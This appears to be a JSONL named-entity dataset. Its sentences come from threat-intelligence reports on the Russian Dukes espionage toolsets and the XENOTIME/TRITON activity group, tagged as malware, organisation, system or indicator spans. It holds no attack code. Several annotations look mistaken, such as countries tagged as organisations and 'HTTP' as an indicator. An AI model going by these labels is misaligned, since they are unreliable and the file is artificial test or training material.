{"text": "The OnionDuke toolset also includes a dropper , an information stealer variant and multiple distinct versions of the core component that is responsible for interacting with the various modules .", "spans": [{"start": 4, "end": 13, "label": "Malware"}]}
{"text": "What makes OnionDuke especially curious is an infection vector it began using during the summer of 2013 .", "spans": [{"start": 11, "end": 20, "label": "Malware"}]}
{"text": "To spread the toolset , the Dukes used a wrapper to combine OnionDuke with legitimate applications , created torrent files containing these trojanized applications , then uploaded them to websites hosting torrent files .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 60, "end": 69, "label": "Malware"}]}
{"text": "Victims who used the torrent files to download the applications would end up getting infected with OnionDuke .", "spans": [{"start": 99, "end": 108, "label": "Malware"}]}
{"text": "For most of the OnionDuke components we observed , the first versions that we are aware of were compiled during the summer of 2013 , suggesting that this was a period of active development around this toolset .", "spans": [{"start": 16, "end": 25, "label": "Malware"}]}
{"text": "Critically however , the first sample of the OnionDuke dropper , which we have observed being used only with components of this toolset , was compiled on the 17th of February 2013 .", "spans": [{"start": 45, "end": 54, "label": "Malware"}]}
{"text": "This is significant because it suggests that OnionDuke was under development before any part of the Duke operation became public .", "spans": [{"start": 45, "end": 54, "label": "Malware"}, {"start": 100, "end": 104, "label": "Organization"}]}
{"text": "OnionDuke \u2019s development therefore could not have been simply a response to the outing of one of the other Duke malware , but was instead intended for use alongside the other toolsets .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 107, "end": 111, "label": "Organization"}]}
{"text": "This indication that the Dukes planned to use an arsenal of 5 malware toolsets in parallel suggests that they were operating with both significant resources and capacity .", "spans": [{"start": 25, "end": 30, "label": "Organization"}]}
{"text": "In 2013 , many of the decoy documents employed by the Dukes in their campaigns were related to Ukraine ; examples include a letter undersigned by the First Deputy Minister for Foreign Affairs of Ukraine , a letter from the embassy of the Netherlands in Ukraine to the Ukrainian Ministry of Foreign affairs and a document titled \u201c Ukraine \u2019s Search for a Regional Foreign Policy \u201d .", "spans": [{"start": 54, "end": 59, "label": "Organization"}, {"start": 176, "end": 191, "label": "Organization"}, {"start": 268, "end": 286, "label": "Organization"}, {"start": 290, "end": 305, "label": "Organization"}]}
{"text": "These decoy documents however were written before the start of the November 2013 Euromaidan protests in Ukraine and the subsequent upheaval .", "spans": [{"start": 104, "end": 111, "label": "Organization"}]}
{"text": "It is therefore important to note that , contrary to what might be assumed , we have actually observed a drop instead of an increase in Ukraine related campaigns from the Dukes following the country \u2019s political crisis .", "spans": [{"start": 171, "end": 176, "label": "Organization"}]}
{"text": "This is in stark contrast to some other suspected Russian threat actors ( such as Operation Pawn Storm ) who appear to have increased their targeting of Ukraine following the crisis .", "spans": []}
{"text": "This supports our analysis that the overarching theme in the Dukes \u2019 targeting is the collection of intelligence to support diplomatic efforts .", "spans": [{"start": 61, "end": 66, "label": "Organization"}]}
{"text": "The Dukes actively targeted Ukraine before the crisis , at a time when Russia was still weighing her options , but once Russia moved from diplomacy to direct action , Ukraine was no longer relevant to the Dukes in the same way .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 205, "end": 210, "label": "Organization"}]}
{"text": "In a surprising turn of events , in September 2013 a CosmicDuke campaign was observed targeting Russian speakers involved in the trade of illegal and controlled substances .", "spans": [{"start": 53, "end": 63, "label": "Malware"}]}
{"text": "Kaspersky Labs , who sometimes refer to CosmicDuke as \u2018 Bot Gen Studio \u2019 , speculated that \u201c one possibility is that \u2018 Bot Gen Studio \u2019 is a malware platform also available as a so-called \u2018 legal spyware \u2019 tool \u201d ;", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 40, "end": 50, "label": "Malware"}]}
{"text": "therefore , those using CosmicDuke to target drug dealers and those targeting governments are two separate entities .", "spans": [{"start": 24, "end": 34, "label": "Malware"}]}
{"text": "We however feel it is unlikely that the CosmicDuke operators targeting drug dealers and those targeting governments could be two entirely independent entities .", "spans": [{"start": 40, "end": 50, "label": "Malware"}]}
{"text": "A shared supplier of malware would explain the overlap in tools , but it would not explain the significant overlap we have also observed in operational techniques related to command and control infrastructure .", "spans": []}
{"text": "Instead , we feel the targeting of drug dealers was a new task for a subset of the Dukes group , possibly due to the drug trade \u2019s relevance to security policy issues .", "spans": [{"start": 83, "end": 88, "label": "Organization"}]}
{"text": "We also believe the tasking to have been temporary , because we have not observed any further similar targeting from the Dukes after the spring of 2014 .", "spans": [{"start": 121, "end": 126, "label": "Organization"}]}
{"text": "While MiniDuke activity decreased significantly during the rest of 2013 following the attention it garnered from researchers , the beginning of 2014 saw the toolset back in full force .", "spans": [{"start": 6, "end": 14, "label": "Malware"}]}
{"text": "All MiniDuke components , from the loader and downloader to the backdoor , had been slightly updated and modified during the downtime .", "spans": [{"start": 4, "end": 12, "label": "Malware"}]}
{"text": "Interestingly , the nature of these modifications suggests that their primary purpose was to regain the element of stealth and undetectability that had been lost almost a year earlier .", "spans": []}
{"text": "Of these modifications , arguably the most important were the ones done to the loader .", "spans": []}
{"text": "These resulted in a loader version that would later become known as the \u201c Nemesis Gemina loader \u201d due to PDB strings found in many of the samples .", "spans": [{"start": 74, "end": 95, "label": "Malware"}, {"start": 105, "end": 108, "label": "System"}]}
{"text": "It is however still only an iteration on earlier versions of the MiniDuke loader .", "spans": [{"start": 65, "end": 73, "label": "Malware"}]}
{"text": "The first observed samples of the Nemesis Gemina loader ( compiled on 14th December 2013 ) were used to load the updated MiniDuke backdoor , but by the spring of 2014 the Nemesis Gemina loader was also observed in use with CosmicDuke .", "spans": [{"start": 34, "end": 55, "label": "Malware"}, {"start": 121, "end": 138, "label": "Malware"}, {"start": 171, "end": 192, "label": "Malware"}, {"start": 223, "end": 233, "label": "Malware"}]}
{"text": "Following the MiniDuke expose , CosmicDuke in turn got its moment of fame when F-Secure published a whitepaper about it on 2nd July 2014 .", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 32, "end": 42, "label": "Malware"}, {"start": 79, "end": 87, "label": "Organization"}]}
{"text": "The next day , Kaspersky also published their own research on the malware .", "spans": [{"start": 15, "end": 24, "label": "Organization"}]}
{"text": "It should be noted that until this point , even though CosmicDuke had been in active use for over 4 years , and had undergone minor modifications and updates during that time , even the most recent CosmicDuke samples would often embed persistence components that date back to 2012 .", "spans": [{"start": 55, "end": 65, "label": "Malware"}, {"start": 198, "end": 208, "label": "Malware"}]}
{"text": "These samples would also contain artefacts of functionality from the earliest CosmicDuke samples from 2010 .", "spans": [{"start": 78, "end": 88, "label": "Malware"}]}
{"text": "It is therefore valuable to observe how the Dukes reacted to CosmicDuke \u2019s outing at the beginning of July .", "spans": [{"start": 61, "end": 71, "label": "Malware"}]}
{"text": "By the end of that month , CosmicDuke samples we found that had been compiled on the 30th of July had shed unused parts of their code that had essentially just been relics of the past .", "spans": [{"start": 27, "end": 37, "label": "Malware"}]}
{"text": "Similarly , some of the hardcoded values that had remained unaltered in CosmicDuke samples for many years had been changed .", "spans": [{"start": 72, "end": 82, "label": "Malware"}]}
{"text": "We believe these edits were an attempt at evading detection by modifying or removing parts of the toolset that the authors believed might be helpful in identifying and detecting it .", "spans": []}
{"text": "Concurrently with the alterations to CosmicDuke , the Dukes were also hard at work modifying their trusted loader .", "spans": [{"start": 37, "end": 47, "label": "Malware"}, {"start": 54, "end": 59, "label": "Organization"}]}
{"text": "Much like the CosmicDuke toolset , the loader used by both MiniDuke and CosmicDuke had previously only undergone one major update ( the Nemesis Gemina upgrade ) since the first known samples from 2010 .", "spans": [{"start": 14, "end": 24, "label": "Malware"}, {"start": 59, "end": 67, "label": "Malware"}, {"start": 72, "end": 82, "label": "Malware"}, {"start": 136, "end": 150, "label": "Malware"}]}
{"text": "Again , much of the modification work focused on removing redundant code in an attempt to appear different from earlier versions of the loader .", "spans": []}
{"text": "Interestingly however , another apparent evasion trick was also attempted - forging of the loaders \u2019 compilation timestamps .", "spans": []}
{"text": "The first CosmicDuke sample we observed after the initial research on CosmicDuke was a sample compiled on the 30th of July 2014 .", "spans": [{"start": 10, "end": 20, "label": "Malware"}, {"start": 70, "end": 80, "label": "Malware"}]}
{"text": "The loader used by the sample purported to have been compiled on the 25th of March 2010 .", "spans": []}
{"text": "Due to artefacts left in the loader during compilation time however , we know that it used a specific version of the Boost library , 1.54.0 , that was only published on the 1st of July 2013 .", "spans": [{"start": 117, "end": 122, "label": "System"}]}
{"text": "The compilation timestamp therefore had to have been faked .", "spans": []}
{"text": "F-Secure \u2019s whitepaper on CosmicDuke includes a timeline of the loader \u2019s usage , based on compilation timestamps .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 26, "end": 36, "label": "Malware"}]}
{"text": "Perhaps the Dukes group thought that by faking a timestamp from before the earliest one cited in the whitepaper , they might be able to confuse researchers .", "spans": [{"start": 12, "end": 17, "label": "Organization"}]}
{"text": "During the rest of 2014 and the spring of 2015 , the Dukes continued making similar evasionfocused modifications to CosmicDuke , as well as experimenting with ways to obfuscate the loader .", "spans": [{"start": 53, "end": 58, "label": "Organization"}, {"start": 116, "end": 126, "label": "Malware"}]}
{"text": "In the latter case however , the group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": [{"start": 164, "end": 174, "label": "Malware"}]}
{"text": "While it is not surprising that the Dukes reacted to multiple companies publishing extensive reports on one of their key toolsets , it is valuable to note the manner in which they responded .", "spans": [{"start": 36, "end": 41, "label": "Organization"}]}
{"text": "Much like the MiniDuke expose in February 2013 , the Dukes again appeared to prioritize continuing operations over staying hidden .", "spans": [{"start": 14, "end": 22, "label": "Malware"}, {"start": 53, "end": 58, "label": "Organization"}]}
{"text": "They could have ceased all use of CosmicDuke ( at least until they had developed a new loader ) or retired it entirely , since they still had other toolsets available .", "spans": [{"start": 34, "end": 44, "label": "Malware"}]}
{"text": "Instead , they opted for minimal downtime and attempted to continue operations , with only minor modifications to the toolset .", "spans": []}
{"text": "While we now know that CozyDuke had been under development since at least the end of 2011 , it was not until the early days of July 2014 that the first large-scale CozyDuke campaign that we are aware of took place .", "spans": [{"start": 23, "end": 31, "label": "Malware"}, {"start": 164, "end": 172, "label": "Malware"}]}
{"text": "This campaign , like later CozyDuke campaigns , began with spear-phishing emails that tried to impersonate commonly seen spam emails .", "spans": [{"start": 27, "end": 35, "label": "Malware"}, {"start": 74, "end": 80, "label": "System"}, {"start": 126, "end": 132, "label": "System"}]}
{"text": "These spear-phishing emails would contain links that eventually lead the victim to becoming infected with CozyDuke .", "spans": [{"start": 21, "end": 27, "label": "System"}, {"start": 106, "end": 114, "label": "Malware"}]}
{"text": "Some of the CozyDuke spear-phishing emails from early July posed as e-fax arrival notifications , a popular theme for spam emails , and used the same \u201c US letter fax test page \u201d decoy document that was used a year later by CloudDuke .", "spans": [{"start": 12, "end": 20, "label": "Malware"}, {"start": 36, "end": 42, "label": "System"}, {"start": 68, "end": 73, "label": "System"}, {"start": 123, "end": 129, "label": "System"}, {"start": 162, "end": 165, "label": "System"}, {"start": 223, "end": 232, "label": "Malware"}]}
{"text": "In at least one case however , the email instead contained a link to a zip archive file named \u201c Office Monkeys LOL Video.zip \u201d , which was hosted on the DropBox cloud storage service .", "spans": [{"start": 35, "end": 40, "label": "System"}, {"start": 71, "end": 74, "label": "System"}, {"start": 96, "end": 124, "label": "Indicator"}, {"start": 153, "end": 160, "label": "System"}]}
{"text": "What made this particular case interesting was that instead of the usual dull PDF file , the decoy was a Flash video file , more specifically a Super Bowl advertisement from 2007 purporting to show monkeys at an office .", "spans": [{"start": 78, "end": 81, "label": "System"}, {"start": 105, "end": 110, "label": "System"}]}
{"text": "THE DUKES 7 YEARS OF RUSSIAN CYBERESPIONAGE .", "spans": [{"start": 4, "end": 9, "label": "Organization"}]}
{"text": "Release_Time : 2015-09", "spans": []}
{"text": "Report_URL : https://blog-assets.f-secure.com/wp-content/uploads/2020/03/18122307/F-Secure_Dukes_Whitepaper.pdf", "spans": []}
{"text": "2014 : OnionDuke gets caught using a malicious Tor node .", "spans": [{"start": 7, "end": 16, "label": "Malware"}, {"start": 47, "end": 50, "label": "System"}]}
{"text": "On the 23rd of October 2014 , Leviathan Security Group published a blog post describing a malicious Tor exit node they had found .", "spans": [{"start": 30, "end": 54, "label": "Organization"}, {"start": 100, "end": 103, "label": "System"}]}
{"text": "They noted that this node appeared to be maliciously modifying any executables that were downloaded through it over a HTTP connection .", "spans": [{"start": 118, "end": 122, "label": "Indicator"}]}
{"text": "Executing the modified applications obtained this way would result in the victim being infected with unidentified malware .", "spans": []}
{"text": "On the 14th of November , F-Secure published a blog post naming the malware OnionDuke and associating it with MiniDuke and CosmicDuke , the other Duke toolsets known at the time .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 76, "end": 85, "label": "Malware"}, {"start": 110, "end": 118, "label": "Malware"}, {"start": 123, "end": 133, "label": "Malware"}, {"start": 146, "end": 150, "label": "Organization"}]}
{"text": "Based on our investigations into OnionDuke , we believe that for about 7 months , from April 2014 to when Leviathan published their blog post in October 2014 , the Tor exit node identified by the researchers was being used to wrap executables on-the-fly with OnionDuke ( image 7 , page 13 ) .", "spans": [{"start": 33, "end": 42, "label": "Malware"}, {"start": 106, "end": 115, "label": "Organization"}, {"start": 164, "end": 167, "label": "System"}, {"start": 259, "end": 268, "label": "Malware"}]}
{"text": "This is similar to the way in which the toolset was being spread via trojanized applications in torrent files during the summer of 2013 .", "spans": []}
{"text": "While investigating the OnionDuke variant being spread by the malicious Tor node , we also identified another OnionDuke variant that appeared to have successfully compromised multiple victims in the ministry of foreign affairs of an Eastern European country during the spring of 2014 .", "spans": [{"start": 24, "end": 33, "label": "Malware"}, {"start": 72, "end": 75, "label": "System"}, {"start": 110, "end": 119, "label": "Malware"}]}
{"text": "This variant differed significantly in functionality from the one being spread via the Tor node , further suggesting that different OnionDuke variants are intended for different kinds of victims .", "spans": [{"start": 87, "end": 90, "label": "System"}, {"start": 132, "end": 141, "label": "Malware"}]}
{"text": "We believe that , unusually , the purpose of the OnionDuke variant spread via the Tor node was not to pursue targeted attacks but instead to form a small botnet for later use .", "spans": [{"start": 49, "end": 58, "label": "Malware"}, {"start": 82, "end": 85, "label": "System"}]}
{"text": "This OnionDuke variant is related to the one seen during the summer of 2013 being spread via torrent files .", "spans": [{"start": 5, "end": 14, "label": "Malware"}]}
{"text": "Both of these infection vectors are highly indiscriminate and untargeted when compared to spearphishing , the usual infection vector of choice for the Dukes .", "spans": [{"start": 151, "end": 156, "label": "Organization"}]}
{"text": "Further , the functionality of the OnionDuke variant is derived from a number of modules .", "spans": [{"start": 35, "end": 44, "label": "Malware"}]}
{"text": "While one of these modules gathers system information and another attempts to steal the victim \u2019s usernames and passwords , as one would expect from a malware used for a targeted attack , the other two known OnionDuke modules are quite the opposite ; one is designed for use in DoS S-TOOL attacks and the other for posting predetermined messages to the Russian VKontakte social media site .", "spans": [{"start": 208, "end": 217, "label": "Malware"}, {"start": 361, "end": 370, "label": "System"}]}
{"text": "This sort of functionality is more common in criminality-oriented botnets , not statesponsored targeted attacks .", "spans": []}
{"text": "We have since been able to identify at least two separate OnionDuke botnets .", "spans": [{"start": 58, "end": 67, "label": "Malware"}]}
{"text": "We believe the formation of the first of these botnets began in January 2014 , using both unidentified infection vectors and the known malicious Tor node , and continued until our blogpost was published in November .", "spans": [{"start": 145, "end": 148, "label": "System"}]}
{"text": "We believe the formation of the second botnet began in August 2014 and continued until January 2015 .", "spans": []}
{"text": "We have been unable to identify the infection vectors used for this second botnet , but the C&C servers it used had open directory listings , allowing us to retrieve files containing listings of victim IP addresses .", "spans": [{"start": 92, "end": 95, "label": "System"}]}
{"text": "The geographic distribution of these IP addresses ( image 8 , page 13 ) further supports our theory that the purpose of this OnionDuke variant was not targeted attacks against high-profile targets .", "spans": [{"start": 125, "end": 134, "label": "Malware"}]}
{"text": "One theory is that the botnets were a criminal side business for the Dukes group .", "spans": [{"start": 69, "end": 74, "label": "Organization"}]}
{"text": "The size of the botnet however ( about 1400 bots ) is very small if its intended use is for commercial DoS attacks or spam-sending .", "spans": [{"start": 103, "end": 106, "label": "System"}]}
{"text": "Alternatively , OnionDuke also steals user credentials from its victims , providing another potential revenue source .", "spans": [{"start": 16, "end": 25, "label": "Malware"}]}
{"text": "The counter to that argument however is that the value of stolen credentials from users in the countries with the highest percentage of OnionDuke bots ( Mongolia and India ) are among the lowest on underground markets . 2015 : The Dukes up the ante .", "spans": [{"start": 136, "end": 145, "label": "Malware"}, {"start": 231, "end": 236, "label": "Organization"}]}
{"text": "The end of January 2015 saw the start of the most high- volume Duke campaign seen thus far , with thousands of recipients being sent spear-phishing emails that contained links to compromised websites hosting CozyDuke .", "spans": [{"start": 63, "end": 67, "label": "Organization"}, {"start": 148, "end": 154, "label": "System"}, {"start": 208, "end": 216, "label": "Malware"}]}
{"text": "Curiously , the spear-phishing emails were strikingly similar to the e-fax themed spam usually seen spreading ransomware and other common crimeware .", "spans": [{"start": 31, "end": 37, "label": "System"}]}
{"text": "Due to the sheer number of recipients , it may not have been possible to customize the emails in the same way as was possible with lower-volume campaigns .", "spans": [{"start": 87, "end": 93, "label": "System"}]}
{"text": "The similarity to common spam may however also serve a more devious purpose .", "spans": []}
{"text": "It is easy to imagine a security analyst , burdened by the amount of attacks against their network , dismissing such common-looking spam as \u201c just another crimeware spam run \u201d , allowing the campaign to , in essence , hide in the masses .", "spans": []}
{"text": "The CozyDuke activity continues one of the long-running trends of the Dukes operations , the use of multiple malware toolsets against a single target .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 70, "end": 75, "label": "Organization"}]}
{"text": "In this case , the Dukes first attempted to infect large numbers of potential targets with CozyDuke ( and in a more obvious manner than previously seen ) .", "spans": [{"start": 19, "end": 24, "label": "Organization"}, {"start": 91, "end": 99, "label": "Malware"}]}
{"text": "They would then use the toolset to gather initial information on the victims , before deciding which ones to pursue further .", "spans": []}
{"text": "For the victims deemed interesting enough , the Dukes would then deploy a different toolset .", "spans": [{"start": 48, "end": 53, "label": "Organization"}]}
{"text": "We believe the primary purpose of this tactic is an attempt at evading detection in the targeted network .", "spans": []}
{"text": "Even if the noisy initial CozyDuke campaign is noticed by the victim organization , or by someone else who then makes it publicly known , defenders will begin by first looking for indicators of compromise ( IOCs ) related to the CozyDuke toolset .", "spans": [{"start": 26, "end": 34, "label": "Malware"}, {"start": 180, "end": 204, "label": "System"}, {"start": 207, "end": 211, "label": "System"}, {"start": 229, "end": 237, "label": "Malware"}]}
{"text": "If however by that time the Dukes are already operating within the victim \u2019s network , using an another toolset with different IOCs , then it is reasonable to assume that it will take much longer for the victim organization to notice the infiltration .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 127, "end": 131, "label": "System"}]}
{"text": "In previous cases , the group used their malware toolsets interchangeably , as either the initial or a later-stage toolset in a campaign .", "spans": []}
{"text": "For these CozyDuke campaigns however , the Dukes appear to have employed two particular later-stage toolsets , SeaDuke and HammerDuke , that were purposely designed to leave a persistent backdoor on the compromised network .", "spans": [{"start": 10, "end": 18, "label": "Malware"}, {"start": 43, "end": 48, "label": "Organization"}, {"start": 111, "end": 118, "label": "Malware"}, {"start": 123, "end": 133, "label": "Malware"}]}
{"text": "HammerDuke is a set of backdoors that was first seen in the wild in February 2015 , while SeaDuke is a crossplatform backdoor that was , according to Symantec , first spotted in the wild in October 2014 .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 90, "end": 97, "label": "Malware"}, {"start": 150, "end": 158, "label": "Organization"}]}
{"text": "Both toolsets were originally spotted being deployed by CozyDuke to its victims .", "spans": [{"start": 56, "end": 64, "label": "Malware"}]}
{"text": "What makes SeaDuke special is that it was written in Python and designed to work on both Windows and Linux systems ; it is the first cross-platform tool we have seen from the Dukes .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 53, "end": 59, "label": "System"}, {"start": 89, "end": 96, "label": "System"}, {"start": 101, "end": 106, "label": "System"}, {"start": 175, "end": 180, "label": "Organization"}]}
{"text": "One plausible reason for developing such a flexible malware might be that the group were increasingly encountering victim environments where users were using Linux as their desktop operating system .", "spans": [{"start": 158, "end": 163, "label": "System"}]}
{"text": "Meanwhile , HammerDuke is a Windows only malware ( written in .NET ) and comes in two variants .", "spans": [{"start": 12, "end": 22, "label": "Malware"}, {"start": 28, "end": 35, "label": "System"}, {"start": 62, "end": 66, "label": "System"}]}
{"text": "The simpler one will connect to a hardcoded C&C server over HTTP or HTTPS to download commands to execute .", "spans": [{"start": 44, "end": 47, "label": "System"}, {"start": 60, "end": 64, "label": "Indicator"}, {"start": 68, "end": 73, "label": "Indicator"}]}
{"text": "The more advanced variant , on the other hand , will use an algorithm to generate a periodically-changing Twitter account name and will then attempt to find tweets from that account containing links to the actual download location of the commands to execute .", "spans": [{"start": 106, "end": 113, "label": "System"}]}
{"text": "In this way , the advanced HammerDuke variant attempts to hide its network traffic in more legitimate use of Twitter .", "spans": [{"start": 27, "end": 37, "label": "Malware"}, {"start": 109, "end": 116, "label": "System"}]}
{"text": "This method is not unique to HammerDuke , as MiniDuke , OnionDuke , and CozyDuke all support similar use of Twitter ( image 9 , page 18 ) to retrieve links to additional payloads or commands . 2015 : CloudDuke .", "spans": [{"start": 29, "end": 39, "label": "Malware"}, {"start": 45, "end": 53, "label": "Malware"}, {"start": 56, "end": 65, "label": "Malware"}, {"start": 72, "end": 80, "label": "Malware"}, {"start": 108, "end": 115, "label": "System"}, {"start": 200, "end": 209, "label": "Malware"}]}
{"text": "In the beginning of July 2015 , the Dukes embarked on yet another large-scale phishing campaign .", "spans": [{"start": 36, "end": 41, "label": "Organization"}]}
{"text": "The malware toolset used for this campaign was the previously unseen CloudDuke and we believe that the July campaign marks the first time that this toolset was deployed by the Dukes , other than possible small-scale testing .", "spans": [{"start": 69, "end": 78, "label": "Malware"}, {"start": 176, "end": 181, "label": "Organization"}]}
{"text": "The CloudDuke toolset consists of at least a loader , a downloader , and two backdoor variants .", "spans": [{"start": 4, "end": 13, "label": "Malware"}, {"start": 45, "end": 51, "label": "Malware"}, {"start": 56, "end": 66, "label": "Malware"}]}
{"text": "Both backdoors ( internally referred to by their authors as \u201c BastionSolution \u201d and \u201c OneDriveSolution \u201d ) essentially allow the operator to remotely execute commands on the compromised machine .", "spans": [{"start": 62, "end": 77, "label": "Malware"}, {"start": 86, "end": 102, "label": "Malware"}]}
{"text": "The way in which each backdoor does so however is significantly different .", "spans": []}
{"text": "While the BastionSolution variant simply retrieves commands from a hard-coded C&C server controlled by the Dukes , the OneDriveSolution utilizes Microsoft \u2019s OneDrive cloud storage service for communicating with its masters , making it significantly harder for defenders to notice the traffic and block the communication channel .", "spans": [{"start": 10, "end": 25, "label": "Malware"}, {"start": 78, "end": 81, "label": "System"}, {"start": 107, "end": 112, "label": "Organization"}, {"start": 119, "end": 135, "label": "Malware"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 158, "end": 166, "label": "System"}]}
{"text": "What is most significant about the July 2015 CloudDuke campaign is the timeline .", "spans": [{"start": 45, "end": 54, "label": "Malware"}]}
{"text": "The campaign appeared to consist of two distinct waves of spear-phishing , one during the first days of July and the other starting from the 20th of the month .", "spans": []}
{"text": "Details of the first wave , including a thorough technical analysis of CloudDuke , was published by Palo Alto Networks on 14th July .", "spans": [{"start": 71, "end": 80, "label": "Malware"}, {"start": 100, "end": 118, "label": "Organization"}]}
{"text": "This was followed by additional details from Kaspersky in a blog post published on 16th July .", "spans": [{"start": 45, "end": 54, "label": "Organization"}]}
{"text": "Both publications happened before the second wave took place and received notable publicity .", "spans": []}
{"text": "Despite the attention and public exposure of the toolset \u2019s technical details ( including IOCs ) to defenders , the Dukes still continued with their second wave of spear-phishing , including the continued use of CloudDuke .", "spans": [{"start": 90, "end": 94, "label": "System"}, {"start": 116, "end": 121, "label": "Organization"}, {"start": 212, "end": 221, "label": "Malware"}]}
{"text": "The group did change the contents of the spear-phishing emails they sent , but they didn\u2019t switch to a new email format ; instead , they reverted to the same efaxthemed format that they had previously employed , even to the point of reusing the exact same decoy document that they had used in the CozyDuke campaign a year earlier ( July 2014 ) .", "spans": [{"start": 56, "end": 62, "label": "System"}, {"start": 107, "end": 112, "label": "System"}, {"start": 297, "end": 305, "label": "Malware"}]}
{"text": "This once more highlights two crucial behavioral elements of the Dukes group .", "spans": [{"start": 65, "end": 70, "label": "Organization"}]}
{"text": "Firstly , as with the MiniDuke campaigns of February 2013 and CosmicDuke campaigns in the summer of 2014 , again the group clearly prioritized the continuation of their operations over maintaining stealth .", "spans": [{"start": 22, "end": 30, "label": "Malware"}, {"start": 62, "end": 72, "label": "Malware"}]}
{"text": "Secondly , it underlines their boldness , arrogance and self-confidence ; they are clearly confident in both their ability to compromise their targets even when their tools and techniques are already publicly known , and critically , they appear to be extremely confident in their ability to act with impunity . 2015 : Continuing surgical strikes with CosmicDuke .", "spans": [{"start": 352, "end": 362, "label": "Malware"}]}
{"text": "In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke .", "spans": [{"start": 64, "end": 72, "label": "Malware"}, {"start": 77, "end": 86, "label": "Malware"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 166, "end": 176, "label": "Malware"}]}
{"text": "The latest of these campaigns that we are aware of occurred during the spring and early summer of 2015 .", "spans": []}
{"text": "As their infection vectors , these campaigns used malicious documents exploiting recently fixed vulnerabilities .", "spans": []}
{"text": "Two of these campaigns were detailed in separate blog posts by the Polish security company Prevenity , who said that both campaigns targeted Polish entities with spear- phishing emails containing malicious attachments with relevant Polish language names .", "spans": [{"start": 91, "end": 100, "label": "Organization"}, {"start": 178, "end": 184, "label": "System"}]}
{"text": "A third , similar , CosmicDuke campaign was observed presumably targeting Georgian entities since it used an attachment with a Georgian-language name that translates to \u201c NATO consolidates control of the Black Sea.docx \u201d .", "spans": [{"start": 20, "end": 30, "label": "Malware"}, {"start": 171, "end": 218, "label": "Indicator"}]}
{"text": "Based on this , we do not believe that the Dukes are replacing their covert and targeted campaigns with the overt and opportunistic CozyDuke and CloudDuke style of campaigns .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 132, "end": 140, "label": "Malware"}, {"start": 145, "end": 154, "label": "Malware"}]}
{"text": "Instead , we believe that they are simply expanding their activities by adding new tools and techniques .", "spans": []}
{"text": "A XENOTIME to Remember : Veles in the Wild .", "spans": [{"start": 2, "end": 10, "label": "Organization"}, {"start": 25, "end": 30, "label": "System"}]}
{"text": "FireEye recently published a blog covering the tactics , techniques , and procedures ( TTPs ) for the \u201c TRITON actor \u201d when preparing to deploy the TRITON / TRISIS malware framework in 2017 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 104, "end": 110, "label": "Malware"}, {"start": 148, "end": 154, "label": "Malware"}, {"start": 157, "end": 163, "label": "Malware"}]}
{"text": "Overall , the post does a commendable job in making public findings previously only privately shared ( presumably by FireEye , and in several reports I authored for my employer , Dragos ) to threat intelligence customers .", "spans": [{"start": 117, "end": 124, "label": "Organization"}, {"start": 179, "end": 185, "label": "Organization"}]}
{"text": "As such , the blog continues to push forward the narrative of how ICS attacks are enabled through prepositioning and initial intrusion operations \u2013 an item I have discussed at length .", "spans": [{"start": 66, "end": 69, "label": "System"}]}
{"text": "Yet one point of confusion in the blog comes at the very start : referring to the entity responsible for TRITON as the \u201c TRITON actor \u201d .", "spans": [{"start": 105, "end": 111, "label": "Malware"}, {"start": 121, "end": 127, "label": "Malware"}]}
{"text": "This seems confusing as FireEye earlier publicly declared the \u201c TRITON actor \u201d as a discrete entity , linked to a Russian research institution , and christened it as \u201c TEMP.Veles \u201d .", "spans": [{"start": 24, "end": 31, "label": "Organization"}, {"start": 64, "end": 70, "label": "Malware"}, {"start": 168, "end": 178, "label": "Organization"}]}
{"text": "In the 2018 public posting announcing TEMP.Veles , FireEye researchers noted that the institute in question at least supported TEMP.Veles activity in deploying TRITON , with subsequent public presentations at Cyberwarcon and the Kaspersky Lab sponsored Security Analyst Summit essentially linking TRITON and the research institute ( and therefore TEMP.Veles ) as one in the same .", "spans": [{"start": 38, "end": 48, "label": "Organization"}, {"start": 51, "end": 58, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 160, "end": 166, "label": "Malware"}, {"start": 209, "end": 220, "label": "Organization"}, {"start": 229, "end": 242, "label": "Organization"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 297, "end": 303, "label": "Malware"}, {"start": 347, "end": 357, "label": "Malware"}]}
{"text": "Yet the most-recent posting covering TTPs from initial access through prerequisites to enable final delivery of effects on target ( deploying TRITON / TRISIS ) avoids the use of the TEMP.Veles term entirely .", "spans": [{"start": 142, "end": 148, "label": "Malware"}, {"start": 151, "end": 157, "label": "Malware"}, {"start": 182, "end": 192, "label": "Organization"}]}
{"text": "In subsequent discussion , FireEye personnel indicate that there was not \u201c an avalanche of evidence to substantiate \u201d anything more than \u201c TRITON actor \u201d \u2013 summing matters by indicating this term \u201c is the best we \u2019ve got for the public for now \u201d .", "spans": [{"start": 27, "end": 34, "label": "Organization"}, {"start": 139, "end": 145, "label": "Malware"}]}
{"text": "Meanwhile , parallel work at Dragos ( my employer , where I have performed significant work on the activity described above ) uncovered similar conclusions concerning TTPs and behaviors , for both the 2017 event and subsequent activity in other industrial sectors .", "spans": [{"start": 29, "end": 35, "label": "Organization"}]}
{"text": "Utilizing Diamond Model methodology for characterizing activity by behaviors attached to victims , we began tracking TRITON / TRISIS and immediate enabling activity as a distinct activity group ( collection of behaviors , infrastructure , and victimology ) designated XENOTIME .", "spans": [{"start": 10, "end": 23, "label": "System"}, {"start": 117, "end": 123, "label": "Malware"}, {"start": 126, "end": 132, "label": "Malware"}, {"start": 268, "end": 276, "label": "Organization"}]}
